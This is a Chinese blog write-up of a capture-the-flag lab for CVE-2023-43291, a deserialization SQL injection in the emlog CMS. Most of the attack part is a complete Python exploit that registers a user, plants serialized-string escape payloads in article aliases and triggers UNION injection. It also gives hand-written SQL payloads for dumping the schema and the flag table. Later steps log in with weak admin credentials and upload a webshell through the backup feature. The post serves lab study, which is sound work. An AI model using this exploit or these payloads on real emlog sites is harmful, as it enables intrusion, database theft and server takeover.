【春秋云镜】CVE-2023-43291 emlog SQL注入

已于 2024-04-24 16:06:36 修改
阅读量898 收藏 13
点赞数 7
分类专栏: 靶场WP 文章标签: sql android 数据库
于 2024-04-16 15:40:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/137824672
版权
文章描述了emlog软件的一个安全漏洞,允许远程攻击者通过数据反序列化执行SQL语句。POC代码演示了如何注册用户、写入payload并触发SQL注入,尽管作者未获取到flag,但提供了执行SQL的示例和寻找flag的方法。
摘要由CSDN通过智能技术生成

靶场介绍

emlog是一款轻量级博客及CMS建站系统,在emlog pro v.2.1.15及更早版本中的不受信任数据反序列化允许远程攻击者通过cache.php组件执行SQL语句。

不感兴趣的可以直接拉到最后面,直接获取flag
这位博主写的很好:【春秋云镜】CVE-2023-43291 反序列化字符串逃逸+sql注入
备注:本文章没有通过sql注入获取到flag,但是通过其他方法获得了,如果有大佬通过sql注入获取flag请告诉我。(上面这位大佬)

开启靶场

在这里插入图片描述
搜索POC,该POC是执行user()函数

import requests
import sys
import time
requests.packages.urllib3.disable_warnings()

url = "http://eci-2ze5lrqt8xe7n32hn1rm.cloudeci1.ichunqiu.com"
session = requests.session()
proxy = {
    "http": "127.0.0.1:8080",     "https": "127.0.0.1:8080"
}

# Step1 注册一个账户并登录,获取token
def step1():
    url_register = "/admin/account.php?action=dosignup"
    data_register = {
        "mail":"9a6d0oL@test.com",
        "passwd":"password",
        "repasswd": "password"
    }
    session.post(url+url_register, data=data_register, verify=False, allow_redirects=False, proxies=proxy)

    url_login = "/admin/account.php?action=dosignin&s="
    data_login = {
        "user": "9a6d0oL@test.com",
        "pw": "password"
    }
    res = session.post(url+url_login, data=data_login, verify=False, allow_redirects=False, proxies=proxy)
    if res.status_code != 302 or res.headers.get("Location") != "./":
        print("登录错误")
        exit()

    url_token = "/admin/article.php"
    res = session.get(url+url_token, verify=False, allow_redirects=False, proxies=proxy)
    while res.status_code != 200:   # 因为该cms会随机进行重新的身份认证,详见include/service/user.php:106
        res = session.get(url+url_token, verify=False, allow_redirects=False, proxies=proxy)
    global token
    try:
        token = res.text.split('id="token" value="')[1].split('"')[0].strip()
    except:
        token = ""
    
# Step2 新建两篇文章,设置两篇文章的alias,写入payload
def step2():
    url_article = "/admin/article_save.php?action=autosave"
    data_article = {
        "logcontent": time.time(), 
        "logexcerpt": '', 
        "title": time.time(), 
        "cover": '', 
        "alias": time.time(), 
        "sort": "-1", 
        "postdate": "2022-10-16 00:01:34", 
        "date": '', 
        "tag": '', 
        "top": "n", 
        "sortop": "n", 
        "allow_remark": "y", 
        "password": '', 
        "token": token, 
        "ishide": "y", 
        "as_logid": "-1"
    }

    # 新建第一篇文章
    res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)
    while res.status_code != 200:
        res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)
    try:
        id_1 = res.text.split(":")[1].split("_")[0]
    except:
        print("error,请手动删除当前用户所有文章以及草稿再重新运行此poc.")
        exit()
    # 新建第二篇文章
    data_article["logcontent"] = time.time()
    data_article["title"] = time.time()
    data_article["alias"] = time.time()
    res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)
    while res.status_code != 200:
        res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)
    try:
        id_2 = int(res.text.split(":")[1].split("_")[0])
    except:
        print("error,请手动删除当前用户所有文章以及草稿再重新运行此poc.")
        exit()

    # 更改第二篇文章的alias
    # payload = '''";s:87:"0 union select 1,user(),'1','','','','',1,-1,'blog',1,1,0,'n','n','n','y','y','','',''#";s:1:"Y'''
    payload = '''";s:93:"0 union select 1,user(),'1','','','','',1,-1,'blog',1,1,0,'n','n','n','y','y','','','','',''#";s:1:"Y'''
    data_article["as_logid"] = id_2
    print (id_2)
    if id_2 < 10:
        data_article["alias"] = payload
    if id_2 >= 10:
        data_article["alias"] = payload[1:]
    if id_2 >= 100:
        # data_article["alias"] = ''';s:81:"0 union select 1,user(),1,'','','','',1,-1,'blog',1,1,0,'','','','y','','','',''#";s:1:"Y'''
        data_article["alias"] = ''';s:87:"0 union select 1,user(),1,'','','','',1,-1,'blog',1,1,0,'','','','y','','','','','',''#";s:1:"Y'''
    res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)
    while res.status_code != 200:
        res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)

    # 更改第一篇文章的alias
    data_article["as_logid"] = id_1
    data_article["alias"] = "<?php exit;//"
    res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)
    while res.status_code != 200:
        res = session.post(url+url_article, data=data_article, verify=False, allow_redirects=False, proxies=proxy)

# Step3 访问触发反序列化以及sql注入
def step3():
    headers = {
        "X-Rewrite-Url": "/Y",
    }
    res = session.get(url, headers=headers, verify=False, allow_redirects=False, proxies=proxy)
    if res.status_code == 200:
        print(res.text.split("<title>")[1].split("</title>")[0])
    else:
        raise  Exception

if __name__ == "__main__":
    try:
        step3()
    except:
        step1()
        step2()
        step3()

将脚本挂上代理,
step1() //注册用户
step2() //写入payload
step3() //执行脚本

操作步骤

打开burp 挂上代理

注册包全部放通,只保留这个数据包 step2()
在这里插入图片描述
保留第二个数据包 step3()
在这里插入图片描述

执行SQL语句

通过脚本可以获取到执行的命令
在这里插入图片描述

寻找flag位置

将URL编码转换后,可以发现他的语句是这样的:

0 union select 1,user(),‘1’,‘’,‘’,‘’,‘’,1,-1,‘blog’,1,1,0,‘n’,‘n’,‘n’,‘y’,‘y’,‘’,‘’,‘’,‘’,‘’#

然后我们替换user()即可。
0 union select 1,concat(0x7e,(SELECT CONCAT(TABLE_SCHEMA,‘-’,TABLE_NAME, ‘-’,COLUMN_NAME) FROM information_schema.COLUMNS WHERE COLUMN_NAME = ‘flag’ LIMIT 0,1),0x7e),‘1’,‘’,‘’,‘’,‘’,1,-1,‘blog’,1,1,0,‘n’,‘n’,‘n’,‘y’,‘y’,‘’,‘’,‘’,‘’,‘’#

然后数一下前面有你总共输入了多少个字符,例如上面一共是235个字符
在这里插入图片描述

在这里插入图片描述
存在flag
在这里插入图片描述
靶场有3处存在flag列 将limit处修改为 limit 2.1
在这里插入图片描述

得知存在flllllaaaag表,并且在emlog数据库中,然后编写payload

0 union select 1,concat(0x7e,(select CONCAT(id, ‘-’,flag) from flllllaaaag),0x7e),‘1’,‘’,‘’,‘’,‘’,1,-1,‘blog’,1,1,0,‘n’,‘n’,‘n’,‘y’,‘y’,‘’,‘’,‘’,‘’,‘’#
在这里插入图片描述
结果提示
Illegal mix of collations for operation ‘UNION’
在这里插入图片描述

获取flag 有点生气,然后气了一下

登录admin 密码 admin123
这里可以下载数据库备份
在这里插入图片描述
查看文件的最后

在这里插入图片描述

总结

我太菜了,不知道sql报错怎么解决,有大佬看到这里希望可以研究一下,有成果联系我,感谢感谢。

如果对你有用,请不要取关哦,感谢感谢

获取shell

在看sql文件时发现这里可以修改运行上传的文件类型:
在这里插入图片描述
在页面修改时,修改为php会自动修改为X,这里上传SQL备份后不会改变。
在这里插入图片描述
直接上传webshell
在这里插入图片描述
获取shell
在这里插入图片描述
查看配置文件为
在这里插入图片描述
不活心,可能是不存在flag。
在这里插入图片描述

HMX404
关注
  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2023-25157:GeoServer OGC Filter SQL注入漏洞复现
薛定谔嘚喵博客
09-01 1930
由于系统未对用户输入进行过滤,远程未授权攻击者可以构造特定语句绕过GeoServer的词法解析,从而实现SQL注入,成功利用此漏洞可获取敏感信息,甚至可能获取数据库服务器权限。由于GeoServer在默认配置下内置图层存放数据在文件中,则未使用外置数据库的场景不受此漏洞影响。
春秋云镜CVE-2023-43291 反序列化字符串逃逸+sql注入
RisingFan的博客
04-24 245
emlog是一款轻量级博客及CMS建站系统,在emlog pro v.2.1.15及更早版本中的不受信任数据反序列化允许远程攻击者通过cache.php组件执行SQL语句。如果你是奔着找flag的思路,可以参考我下面的投机取巧,不过不建议这样干,这样其实对你学习这个漏洞,代码审计还是不太好,不建议这么干。先访问/admin看看,尝试了一波弱口令admin/admin123,成功登录。说实话已经写的很详细了,可参考复现,过程很清晰,还带着分析,很人性了。先搜了搜有关漏洞的细节,具体可参考。
Emlog Pro 任意文件上传漏洞(CVE-2023-44974)
流水不争先,争的是滔滔不绝
04-02 905
Emlog Pro 任意文件上传漏洞(CVE-2023-44974)
Emlog漏洞 | EMLOG博客系统存在暴力破解漏洞
DYBOY-程序开发&网络安全
11-03 7117
漏洞简介: Emlog博客系统默认后台登陆地址为http://域名/admin/login.php 而后台登陆时,错误情况下,验证码未刷新,导致可暴力破解登陆管理员账号 低危漏洞,但是在emlog5.3.1和6.0测试版本均存在   漏洞成因:   同时,其6.0测试版本也未修复。   漏洞验证/演示: 下载官方的emlog5.3.1版本 http://www.emlog.n
春秋云镜 CVE-2023-26469
qq274575499的博客
03-29 1467
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋云镜CVE-2023-51048 SCMS v5.0 SQL注入漏洞
RisingFan的博客
04-19 381
春秋云镜CVE-2023-51048 SCMS v5.0 SQL注入漏洞
春秋云境CVE-2023-7105
2303_76653367的博客
05-09 411
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞.3.保存POST包,sqlmap跑,爆库。2.下拉找到搜索框,随便输入,抓包。
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 599
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
春秋云镜 CVE-2022-4230
qq274575499的博客
05-07 920
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云镜 CVE-2023-52064
qq274575499的博客
05-16 422
Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于`/core/admin/copyfrom.php` 的 `$keywords` 参数触发。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
一键备份升级Openssh9.5p1 解决CVE-2023-38408,具体步骤见
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
SQLAlchemy 连接池
youhebuke225的博客
06-17 250
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例
月晓风清
06-15 482
为了实现你需要的操作,即以问题名称作为表头,答案作为内容导出,你可以通过JOIN操作连接三个表,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个表格,表中的每一行表示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定表结构,实际场景和它类似。
PostgreSQL源码分析——INSERT
最新发布
让我思考一下
06-18 318
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
春秋云镜CVE-2023-38836
06-15
很抱歉,由于安全性和隐私保护原则,我无法提供详细的CVE(Common Vulnerabilities and Exposures)报告或漏洞分析,尤其是对于特定的漏洞如春秋云镜CVE-2023-38836。CVE是一个由美国国家网络安全中心维护的系统,用来标识信息安全漏洞。如果你需要了解某个CVE的具体信息,通常应该查阅官方的安全公告、厂商发布的声明,或者使用专业的安全资源和工具进行查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值